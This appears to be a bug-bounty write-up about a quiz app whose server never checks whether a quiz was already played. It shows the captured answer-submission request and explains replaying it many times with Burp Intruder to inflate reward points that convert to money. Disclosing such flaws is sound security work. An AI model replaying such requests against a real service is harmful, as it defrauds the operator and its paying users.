Increasing reward points N number of times

Case Study

As this was a private program all illustrations of vulnerabilities will be represented with the host as

The application is built to play Quiz and win reward points that can be used as money to play Quiz

example: 10 reward points = 1 Rs

to play a quiz you need to pay rs 5 or you can pay 50 reward points and so on. And while registering you get 50 reward points for 1st-time signup. Also, there are free quiz 1 per day where you can earn points.

example: 5 correct ans = 5 points, 10 correct ans = 10 points

minimum correct answer to get reward points is 5.


let’s select a free quiz to earn some points so I managed to get 5 correct answers and awarded 5 points.

HTTP request that takes you answer

POST /endpoint HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1

csrf_test_name=SOME_ID&contestId=MY_ID&stage=SOME_RANDOM_ID&timeTaken=[ARRAY,TO,COLLEECT,TIME ]&questionChoosen=[ ARRAY, OF , ANSWER, EXAMPLE, 1,2,2,3,4 ]&questionTime=["Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz"]&ans=on

intercept the request and send this to intruder

now increase the threads to 25 and select NULL payload in intruder and the number of times you want the reward points to increase.


There is no check whether the quiz is already played or not. They are just checking the number of right answers and awarding points.

queries ping

Twitter :


One comment

Leave a Reply